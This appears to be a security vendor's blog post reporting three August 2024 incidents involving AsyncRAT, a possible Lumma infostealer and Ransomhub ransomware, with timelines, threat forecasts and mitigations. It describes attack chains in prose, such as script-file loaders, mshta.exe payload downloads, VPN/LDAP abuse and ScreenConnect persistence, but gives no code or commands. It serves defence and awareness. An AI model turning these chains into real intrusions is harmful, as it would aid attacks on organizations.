Between August 14-21, 2024, Blackpoint’s Active Security Operations Center (SOC) responded to 85 total incidents throughout our monitored on-premises, Microsoft 365, and Google Workspace environments, with confirmed or likely threat actor use of:
- AsyncRAT for persistence;
- Information stealing malware for credential access and exfiltration; and
- Ransomhub Ransomware for encryption.
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.
AsyncRAT Incident with Healthcare Partner on August 15, 2024
Topline Takeaways
- Industry target: Healthcare
- Attacker information:
- AsyncRAT
- aspnet_compiler.exe
- .zip initial file that contained a .wsf file
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use AsyncRAT to exploit other Healthcare organizations over the next 12 months.
- Recommended remediations and mitigations:
- Employee security training
- Heuristics-based activity monitoring and remediation
- Password managers
- Scripting language controls
AsyncRAT Incident Timeline for 2024-08-15
- Blackpoint’s MDR+R technology alerted to suspicious PowerShell activity on a host of a Healthcare partner.
- Initial investigation by the Active SOC found that the malicious activity originated from the execution of a .zip file that contained a Windows Script File (.wsf), which then pulled down an .htm file.
- Further analysis determined that .html file called out and pulled data from two malicious .xml files.
- These .xml files created a scheduled task “TvMusic”, which executed a malicious .vbs file.
- The .vbs file read the text contents of other malicious files, and then executed the contents into the affected device’s memory.
- Additional investigation of the impacted device identified another malicious executable (“aspnet_compiler.exe”) calling out to a Windows command and control (C2) server, apparently based out of England.
- Active SOC analysts isolated the impacted device to prevent any additional malicious activity, before reaching out to the Healthcare partner with additional details and remediation advice.
More About AsyncRAT
Click for details
AsyncRAT is an open-source remote access tool that published on GitHub and adopted by several threat groups. The malware is capable of multiple actions (1, including:
- Capturing keystrokes on a victim’s machine;
- Examining currently running processes, to determine if a debugger is present on the targeted device;
- Creating scheduled tasks that maintain persistence on infected devices; and
- Recording screen content on infected devices.
AsyncRAT has been used by multiple threat groups and, therefore, post-incident attribution can be difficult. It is likely that AsyncRAT is deployed by threat actors of all skill-levels including APT groups (2) and ransomware operations (3).
APG Threat Analysis of AsyncRAT for 2024
Click for details
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will very likely continue to use AsyncRAT over the next 12 months.
We base this assessment on internal Blackpoint observed incidents, such as this July 22nd incident against a Legal Services partner (4).
The APG’s assessment is augmented by external incident reports that detail the use of AsyncRAT to gain persistence, steal sensitive information, and deploy second stage payloads. For example:
- In August 2024, ConnectWise security researchers reported that AsyncRAT was the third-most common malware observed by the company in July 2024 (5).
- Also in August 2024, ReliaQuest security researchers reported that AsyncRAT remains one of their top malware variants observed in incidents (6).
The continued use of AsyncRAT to collect information, gain persistence, and deploy second-stage malware highlights threat actors’ determination to continue using the tool; it is likely that threat actors will continue to update and improve the tools capabilities over the next 12 months.
Recommended AsyncRAT Mitigations and Remediations
Click for details
Blackpoint’s APG recommends the following remediations of mitigations of threat actor use of AsyncRAT in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
- Consider a refresher for your employees on the specific types of malicious files seen downloaded in this incident, including:
- .zip attachments
- .wsf attachments
- .html attachments
- .xslm attachments
- .pdf attachments
- Consider a refresher for your employees on the specific types of malicious files seen downloaded in this incident, including:
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
- Anomalous scheduled tasks and files stored in seemingly incongruous folders, such as a music folder, can be detected with behavior-based alerting methods – as we saw with this incident.
- Require the use of secure password managers, disabling plaintext password storage and local password caching to make accessing passwords by threat actors from compromised accounts more difficult.
- In this incident, the AsyncRAT malware variant can record keystrokes, which in turn can be used to steal passwords that can be used to conduct additional malicious activities. Using secure password managers can help prevent credentials from being stolen and accounts being accessed by malicious threat actors.
- Minimize the use of – or implement strict controls on – the use of scripting languages, as threat actors rely on scripting languages to deploy malware and conduct malicious activities.
- Threat actors often deploy scripts on a targeted environment to conduct malicious activity, such as Visual Basic file in this incident that was used to read the text contents of another file and execute commands in memory.
- Restricting the ability to conduct this type of activity can help limit a threat actors ability to complete an attack.
Possible Lumma Infostealer Incident with Industrials Partner on August 15, 2024
Topline Takeaways
- Industry target: Industrials
- Attacker information:
- Native Windows binary mshta.exe
- Infostealer malware, possibly Lumma Stealer
- RDP
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use infostealers such as Lumma Stealer to exploit other Industrials organizations over the next 12 months.
- Recommended remediations and mitigations:
- Employee security training
- Dedicated software center
- Least-privilege access controls
- Heuristics-based activity monitoring and remediation
Possible Lumma Stealer Malware Incident Timeline for 2024-08-15
- Blackpoint’s MDR+R technology alerted to the execution of a malicious obfuscated PowerShell on the host of an Industrials partner.
- Initial investigation by the Active SOC identified the threat actor’s payload as an information stealing malware.
- The infected user was likely tricked into opening a malicious file, which then triggered the download and installation of the malware onto the endpoint.
- Additional analysis determined that the malicious file/document triggered the execution of an encoded PowerShell command, which initially tripped the MDR+R alert for analysis.
- The encoded PowerShell command would use the native Windows binary, mshta.exe, to reach out and download a second-stage payload from an external C2 server.
- The hash associated with the second-stage payload has been associated with Lumma Stealer malware family (7).
- The malicious PowerShell script also downloaded another executable, used for network traffic capturing.
- Once the second-stage payload completed download, it triggered the execution of the obfuscated PowerShell command. Analysts determined this command would likely be responsible for establishing persistence and executing other functions of the information stealing malware.
- Active SOC analysts isolated the affected devices and deleted the scheduled tasks to prevent further malicious activity, before then reaching out to the Industrials partner to provide information about the incident and to provide mitigation advice.
More About Lumma Stealer and Other Infostealer Malware
Click for details
Lumma Stealer is a malware-as-a-service (MaaS) that has been advertised on cybercriminal forums since at least 2022. Lumma Stealer is capable of targeting (8):
- Cryptocurrency wallets,
- Browser extensions,
- MFA instances, and
- Other sensitive data from the compromised system.
Information stealers such as Lumma Stealer are an attractive malware choice for threat groups, due to their ability to use and / or exfiltrate gathered information for profitable gain.
As infostealers in general – and Lumma Stealer specifically – is offered on multiple cybercriminal forums and therefore used by multiple threat actors, post-incident attribution as to which group used this malware in this incident is more difficult.
APG Threat Analysis of Lumma Stealer and Other Infostealer Malware for 2024
Click for details
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will likely continue to use infostealer malware such as Lumma Stealer over the next 12 months.
The APG’s assessment is based on external incident reports detailing the deployment of the Lumma Stealer malware. For example:
- In May 2024, eSentire security researchers reported an incident where a threat actor used fake update instances to deliver malware, including Lumma Stealer (9).
- The victim user visited an infected webpage that contained malicious JavaScript code.
- The code then directed the victim to the fake update page, that included a download link to a ZIP archive that automatically downloaded onto the victim’s device.
- The final payload was reportedly BitRAT and/or Lumma Stealer.
- In July 2024, CrowdStrike security researchers reported a phishing domain that impersonated CrowdStrike and delivered malicious ZIP and RAR files containing a Microsoft Installer (MSI) loader (10).
- The loader then reportedly executed Lumma Stealer packed with CypherIt.
Recommended Lumma Stealer and Other Infostealer Malware Mitigations and Remediations
Click for details
Blackpoint’s APG recommends the following remediations of mitigations of threat actor use of infostealer malware – including Lumma Stealer – in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
- Analysis of the incident observed this week indicated that the initial access vector was via a downloaded file, which may have been avoided with regular and effective end user security training.
- Provide a dedicated software center to guarantee employees can easily access the applications and updates required for their jobs from a safe and monitored location, so they don’t “go rogue” and accidentally download malware from a malvertising or SEO poisoned instance.
- Threat actors previously delivered malware, such as the information stealer in this incident, via fake updates and social engineering campaigns that lead victims to malicious websites. A software center with the real version of the faked malware lure might have prevented this incident altogether.
- Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions, making it harder for threat actors to move laterally within the infected environment to more desirable targets.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
- Behavior-based techniques can help identify when a legitimate Windows utility, such as mshta.exe from this incident, is used in a manner that is abnormal within a victim network. Understanding where and why a Windows utility is needed can provide context to effectively determine when it is being used by threat actors.
Ransomhub Ransomware Incident with Onboarding Legal Services Partner on August 16, 2024
Topline Takeaways
- Industry target: Legal Services
- Attacker information:
- Ransomhub Ransomware
- Custom ScreenConnect tool
- netscan
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is almost certainly that threat actors will continue to use Ransomhub Ransomware to exploit other Legal Services organizations over the next 12 months.
- Recommended remediations and mitigations:
- Heuristics-based activity monitoring and remediation
- Proper firewall and VPN configurations
- Multifactor authentication (MFA)
- Create and maintain data backups
Onboarding Ransomhub Ransomware Incident Timeline for 2024-08-16
- While Blackpoint’s Active SOC onboarded a new Legal Services partner, Blackpoint’s MDR+R technology alerted to several detections flagging suspicious activity.
- Initial investigation by the Active SOC revealed a Ransomhub operator abusing and monitoring the partner’s SSL VPN for malicious purposes, with likely initial access due to an LDAP misconfiguration.
- The threat actor-operator gained access to a user account on the network and likely extracted several hashes, cracking them offline.
- The threat actor then logged in to another user account, and abused an LOLDriver technique to deploy their payload.
- Additional threat actor observation by Active SOC analysts found that the threat actor used their own custom ScreenConnect instance for persistence.
- Active SOC analysts contacted the Legal Services partner to discuss the alerts, confirming Ransomhub ransomware targeting with the partner before isolating all impacted devices and recommending additional remediation activities for immediate deployment to prevent further compromise.
More About Ransomhub Ransomware
Click for details
Ransomhub ransomware is a ransomware-as-a-service (RaaS) operation that has been active since at least February 2024, with the operators reportedly taking a 10% commission from affiliates after successful ransom attempts.
Ransomhub is written in Golang and C++, according to an advertisement on a dark-web forum. Its encryptors’ asymmetric algorithm is based on x25519 and adjusted in AES256, ChaCha20, and XChaCha20 (11).
Data leak site tracking by Blackpoint’s Adversary Pursuit Group (APG) found that since February 2024, Ransomhub operators have listed 188 victims, with the majority of victims based out of North America (77) and in the Construction & Engineering (17) and Manufacturing (17) verticals.
However, Ransomhub ransomware has likely impacted more victims than those listed by its primary operators, as the data leak site does not include victims that may have paid the ransom or are otherwise omitted for other reasons known only to the criminals themselves.
APG Threat Analysis of Ransomhub Ransomware for 2024
Click for details
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will almost certainly continue to use Ransomhub ransomware over the next 12 months.
We base this assessment on the APG’s tracking of data leak sites, as reported previously, as well as external incident reports detailing Ransomhub ransomware deployment. For example:
- In August 2024, Sophos security researchers reported that the Ransomhub operators were observed using an EDR-killing tool dubbed EDRKillShifter (12).
- The researchers reported an attempted Ransomhub incident that occurred in May 2024, during which threat actors tried to use the EDRKillShifter to evade detection.
- The identification of a newly observed tool indicates that the Ransomhub ransomware operators are likely determined and sophisticated threat actors invested in enhancing its current malware and ransomware packages, rather than creating net-new code.
- In June 2024, Symantec security researchers reported that the Ransomhub operation is likely related to the Knight ransomware operation (13).
- Knight operators purportedly sold their encryptor.
- Subsequent analysis of the Ransomhub ransomware variant has led security researchers to believe that Ransomhub was likely created by a skilled and sophisticated threat actor updating the Knight encryptor for their own personal ransomware outfit.
Recommended Ransomhub Ransomware Mitigations and Remediations
Click for details
Blackpoint’s APG recommends the following remediations of mitigations of threat actor use ofRansomhub Ransomware in your environment.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
- Behavior-based triggers and alerts can help identify threat actor actions, such as the netscan execution and lateral movement activities seen during this incident, thereby stopping an incident prior to network encryption.
- Establish effective VPN and firewall rules and configurations, including restricting access to port 3389, blocking RDP traffic between network security zones, and proper LDAP configurations.
- VPNs that are configured incorrectly, such as using misconfigured LDAP (which sends traffic in cleartext), can allow threat actors to access credentials for later log-ins to legitimate accounts – as we saw during this incident analysis.
- Additionally, publicly exposed VPN instances allow the threat actors to further abuse the configuration, accessing user accounts and moving laterally through an environment’s network – again, as we saw attempted during this incident.
- Enforce multi-factor authentication (MFA) on all user accounts – especially those with privileged access! – to help decrease the chances of undetected credential compromise.
- If threat actors are able to gain access to hashes or cleartext credentials, as they did during this incident, having MFA enabled can help provide an additional level of authentication to protect user accounts.
- Create and maintain data backups, including offline backups that are kept separate from the network and system. Should your system suffer a lockout from a ransomware attempt, your uncorrupted and easily reinstated data backups become a key part of your business continuity plan to resume regular operations.
References and Resources
A quick note on incident details:
As these analyses concern recent incidents in actively monitored environment, certain details may be occasionally omitted and / or obfuscated, to better secure our partners and protect any still-ongoing investigations.
However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.
Please feel free to reach out to the APG directly if you have any questions about a specific incident!
Click for full reference list
- MITRE’s Repository: “AsyncRAT” by MITRE on 2023-10-10
- Trend Micro’s Blog: “New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware” by Daniel Lunghi; Jaromir Horejsi on 2022-04-27
- Cyberint’s Blog: “Credentials And Control Go Bye, Bye, Bye with AsyncRAT: What You Need to Know” by Adi Bleih on 2024-05-05
- Blackpoint Cyber’s Blog: “SYS01 Stealer, Ratty RAT, and AsyncRAT” by Blackpoint Cyber on 2024-07-26
- ConnectWise’s Blog: “Monthly Threat Brief: July 2024” by Bryson Medlock on 2024-08-19
- ReliaQuest’s Blog: “5 Malware Variants You Should Know” by Hayden Evans on 2024-08-15
- VirusTotal’s Repository: “f734e1c89a5f9279e6f45ca6fcc85d4ae231995715b11203b0e31f4fcd2bc150” by VirusTotal on 2024-08-18
- DarkTrace’s Blog: “The Rise of the Lumma Info-Stealer | Malware-as-a-Service” by Emily Megan Lim on 2023-09-06
- eSentire’s Blog: “Fake Browser Updates delivering BitRAT and Lumma Stealer” by eSentire Threat Response Unit on 2024-05-29
- CrowdStrike’s Blog: “Lumma Stealer Packed with CypherIt Distributed Using Falcon Sensor Update Phishing Lure” by Counter Adversary Operations on 2024-07-24
- Forescout’s Blog: “Analysis: A new ransomware group emerges from the Change Healthcare cyber attack” by Forescout Research – Vedere Labs on 2024-05-09
- Sophos’s Blog: “Ransomware attackers introduce new EDR killer to their arsenal” by Andreas Klopsch on 2024-08-14
- Symantec’s Blog: “RansomHub: New Ransomware has Origins in Older Knight” by Threat Hunter Team on 2024-06-05